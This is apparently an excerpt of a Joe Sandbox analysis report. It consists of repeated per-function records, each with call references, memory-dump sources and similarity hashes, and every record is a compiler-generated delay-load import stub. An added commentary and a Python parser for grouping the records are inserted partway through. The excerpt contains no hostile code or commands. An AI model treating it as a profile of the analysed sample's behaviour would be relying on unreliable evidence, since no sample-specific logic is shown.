                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: d57739f90f66517873d0c405fdc77db1874ee5d0ad8879a5aba58fc37f56dfcf
                                                                                                                                                                                                    • Instruction ID: eec60d3dc24dca3126aa551b11386a332a5ec05dcbb4394fdb607be3d2464854
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d57739f90f66517873d0c405fdc77db1874ee5d0ad8879a5aba58fc37f56dfcf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47B012E5359145BC314473891C07C3F120DF0C2B11330423FF815C0681E840AC480A33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 3ca64b25fcddfda90f4a19402b7b0a016af743dd37929007f3cf7ca35509ba4e
                                                                                                                                                                                                    • Instruction ID: 3d202ab7336f0cbe787597bff946090cd1ac6131e3a86a8785147641366768d5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ca64b25fcddfda90f4a19402b7b0a016af743dd37929007f3cf7ca35509ba4e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B012D9398005AC310472591C07C3B124CF0C3B11330813FFD15C0681F840AC040A33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 24c0fc506574f09e88afcc19bc630a05fa477b90c9ba394cbf3476b3b15148ab
                                                                                                                                                                                                    • Instruction ID: 7eb7f62cc4d3fbdde947b015e86fb3ec51f53eaa5e4c1f45f8320f53452add9f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24c0fc506574f09e88afcc19bc630a05fa477b90c9ba394cbf3476b3b15148ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69B012D5369046AC310473491C07C3F124DF4C2B11330413FF816C0681E840AC040A33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 2bcb63a11adf85494d440a30b0f6487b34f5d0a77865a6305345510cb04efada
                                                                                                                                                                                                    • Instruction ID: 2df7945fa7d4c5903eae2d12de84b9c9a26c0d9ae2591345dacf966c14bca353
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcb63a11adf85494d440a30b0f6487b34f5d0a77865a6305345510cb04efada
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5B012E12580047D3104B2481D02C3B030CF5C1B10330C13FF614D1780D8450C0D0B33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 837ec13d3a7c8bf8bd52aa921e63e72e5be917eb6b80efd7feae9441a67e563b
• Instruction ID: d5499b195d66eef5d832659b5595253d68febe29e0e68949ba8d3a2ac069bad3
• Opcode Fuzzy Hash: 837ec13d3a7c8bf8bd52aa921e63e72e5be917eb6b80efd7feae9441a67e563b
• Instruction Fuzzy Hash: F0B092A1258004BC3204A2481802C3A0208E581B10320812EB814D1680D8484E040A33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 8c5a72e3584ae4a087cdd2435c2166601f2533e352aa8d99828d583be25488c9
• Instruction ID: deba557b9c5065f84276a82ee42ee78c7fac061985c3035abc6d5cf55179beeb
• Opcode Fuzzy Hash: 8c5a72e3584ae4a087cdd2435c2166601f2533e352aa8d99828d583be25488c9
• Instruction Fuzzy Hash: 64B012E1258004BD3204F2481C02C3B030CF5C1B10330C13FF914D1780D8444C080B33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: a3f7a3e1c082e1e3abd41267e1cddc29058bd6d3f77ff557da089d3f7da29260
• Instruction ID: d847ffb4ac5eae46b7388d94efe14e59890c44570d62e7f982bd1cecc9e5ac45
• Opcode Fuzzy Hash: a3f7a3e1c082e1e3abd41267e1cddc29058bd6d3f77ff557da089d3f7da29260
• Instruction Fuzzy Hash: 7AB012C225810A7D3104B3991C02C3B020CF4C1B24330413FF414C1680F8400C040B33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: dfc60447c96de1df77ff8d96371bc3bbbb5a523826340ece79752c23a73d013a
• Instruction ID: badfc8d1ea67ad4a6e7ff03141f7d7fbd6607cbeecc10ae9d4b9c4e8dcbb2c74
• Opcode Fuzzy Hash: dfc60447c96de1df77ff8d96371bc3bbbb5a523826340ece79752c23a73d013a
• Instruction Fuzzy Hash: 8AB012C2258015BC3104B2995D02C3B021CF0C1B14330433FF414C1680FC400D050B33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 88dded6bd90f809e297b71c4fa791d3b892d9b0fe7e5a67985199ffb1c37d152
• Instruction ID: f1c2cb57f367d1b256b7d2a9a2d90e326761e14ef01a3aadac28266215265f8d
• Opcode Fuzzy Hash: 88dded6bd90f809e297b71c4fa791d3b892d9b0fe7e5a67985199ffb1c37d152
• Instruction Fuzzy Hash: 80B012C2258105BC3144B2995C03C3B021CF0C1B15330433FF414C1680F8400C440B33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 5da3a625e8c57afd503c178e828784d86f0220bd3b71cd9d4451a93ca12a7166
• Instruction ID: 4c747d1084a4a42ef5624d2fcaa464d259ec173d935aaa27d44493d5efcd9109
• Opcode Fuzzy Hash: 5da3a625e8c57afd503c178e828784d86f0220bd3b71cd9d4451a93ca12a7166
• Instruction Fuzzy Hash: 30B012C52584047C310873681C06C3F020CF0C2F14330813FF821C0981A8400D080933
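Each block above is the Joe Sandbox IDA plugin's record for one function in the image mapped at 00870000: the APIs it reaches (with the subcall through 0088E85D resolved), the memory dump it was carved from, and the similarity keys (API ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes) that the report uses to match it against other samples. The records above all share API String ID 1269201914-0 and the same path through ___delayLoadHelper2@8, yet every one carries a different Opcode ID, so a lookup keyed on Opcode ID alone will not reveal that they are all the same kind of delay-load import stub rather than sample-specific logic. An analyst working from the exported report text normally parses it into records and groups them by the API-derived keys before reading anything by hand. The following Python is an added example written for this page, not code from Joe Sandbox or from this report; the two records in SAMPLE are copied from the listing above (indentation and link text removed), the section names are those visible in this excerpt plus an assumed "Strings" section, and the record field names are my own.

```python
# Added example: parse Joe Sandbox per-function records and collapse duplicates.
import re
from collections import defaultdict

# Constructed input: two records copied from this page's listing, minus indentation and link text.
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 837ec13d3a7c8bf8bd52aa921e63e72e5be917eb6b80efd7feae9441a67e563b
• Instruction ID: d5499b195d66eef5d832659b5595253d68febe29e0e68949ba8d3a2ac069bad3
• Opcode Fuzzy Hash: 837ec13d3a7c8bf8bd52aa921e63e72e5be917eb6b80efd7feae9441a67e563b
• Instruction Fuzzy Hash: F0B092A1258004BC3204A2481802C3A0208E581B10320812EB814D1680D8484E040A33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 8c5a72e3584ae4a087cdd2435c2166601f2533e352aa8d99828d583be25488c9
• Instruction ID: deba557b9c5065f84276a82ee42ee78c7fac061985c3035abc6d5cf55179beeb
• Opcode Fuzzy Hash: 8c5a72e3584ae4a087cdd2435c2166601f2533e352aa8d99828d583be25488c9
• Instruction Fuzzy Hash: 64B012E1258004BD3204F2481C02C3B030CF5C1B10330C13FF914D1780D8444C080B33
"""

# Headers seen in the listing; "Strings" is assumed from other reports, not shown here.
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LAST_SECTION = "Similarity"  # a header seen after it opens the next record
CALL_RE = re.compile(r"^(?P<name>[^.()\s]+)\.(?P<module>\w+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*(?P<rest>.+)$")


def _parse_call(text):
    m = CALL_RE.match(text)
    return (m["name"], m["module"], m["args"], m["ref"].upper()) if m else None


def parse_records(text):
    """Return one dict per function: direct calls, subcalls, associated dumps, other fields."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if current is None or section == LAST_SECTION:
                current = {"apis": [], "subcalls": [], "associated": [], "fields": {}}
                records.append(current)
            section = line
            continue
        if current is None:  # text before the first header
            continue
        line = line.lstrip("•").strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(line)
            call = _parse_call(sub["rest"] if sub else line)
            if call is None:  # unrecognised call syntax: skip rather than guess
                continue
            if sub:
                current["subcalls"].append((sub["caller"].upper(),) + call)
            else:
                current["apis"].append(call)
        else:  # "Key: value" bullets; an assumed Strings section lands here too
            key, _, value = line.partition(":")
            if key.strip() == "Associated":
                current["associated"].append(value.strip())
            else:
                current["fields"][key.strip()] = value.strip()
    return records


def summarize(records):
    """Per API String ID: function count, distinct Opcode IDs, and where the calls sit."""
    groups = defaultdict(list)
    for r in records:
        groups[r["fields"].get("API String ID", "")].append(r)
    return {key: {"functions": len(rs),
                  "distinct_opcode_ids": len({r["fields"].get("Opcode ID") for r in rs}),
                  "refs": sorted(ref for r in rs for _, _, _, ref in r["apis"])}
            for key, rs in groups.items()}


def delay_load_thunks(records):
    """Records whose only direct call is the CRT delay-load helper: import stubs, not sample logic."""
    return [r for r in records
            if r["apis"] and all(name == "___delayLoadHelper2@8" for name, *_ in r["apis"])]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(summarize(recs), len(delay_load_thunks(recs)), "delay-load thunks")
```

Running it on the two sample records groups both under 1269201914-0 with two distinct Opcode IDs and flags both as delay-load thunks. On a full report the same grouping makes the sample-specific functions stand out: anything whose API String ID is shared only by records in this file, or whose direct calls go beyond the CRT helper, is where the sample's own behaviour lives; the fuzzy hashes are for comparing records across reports and are carried through untouched because their algorithm is not documented on this page.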
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: c185aa6aff6ea3e9302910836cdb1309461be42337afe475834d768c48daff9d
• Instruction ID: b2bb7146d3791c64bd0d95d66f99929ffab078dfb83a1b39ac78a329a225ee6b
• Opcode Fuzzy Hash: c185aa6aff6ea3e9302910836cdb1309461be42337afe475834d768c48daff9d
• Instruction Fuzzy Hash: 2CB012C12585447C3108B24C1D02C3F064CF0C6F24330813FF915C0680E8400C050A33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: e2b8067441675da1f2cb2c36a79f5923e3f02fcccec972e2ef5e362fefe1912b
• Instruction ID: 522ea448300ce72b315f0a0e05cecc40b2bfd13448dd09bc3468490436e67f5c
• Opcode Fuzzy Hash: e2b8067441675da1f2cb2c36a79f5923e3f02fcccec972e2ef5e362fefe1912b
• Instruction Fuzzy Hash: E1B012C12585047D3108B34C1C02D3F024CF4C2F24330813FF815C0680E8400C040A33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: c8bdc6f75f9f48a601791f850e3a1ea97d91d0483a6b5180c90f5b4cd9fc40ce
• Instruction ID: fc437287cc2c72dce71fb86dcde51269cec96b7898e71598a8c25b962bedba64
• Opcode Fuzzy Hash: c8bdc6f75f9f48a601791f850e3a1ea97d91d0483a6b5180c90f5b4cd9fc40ce
• Instruction Fuzzy Hash: 9AB012C12585047C3208B24C5C03C3F020CF0D2F15330433FF815C0680E8400C480A33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 079d83838d894a5c99e3f3c1ae53541432a8a2e1e588031d361c121ef52eb104
• Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
• Opcode Fuzzy Hash: 079d83838d894a5c99e3f3c1ae53541432a8a2e1e588031d361c121ef52eb104
• Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
APIs
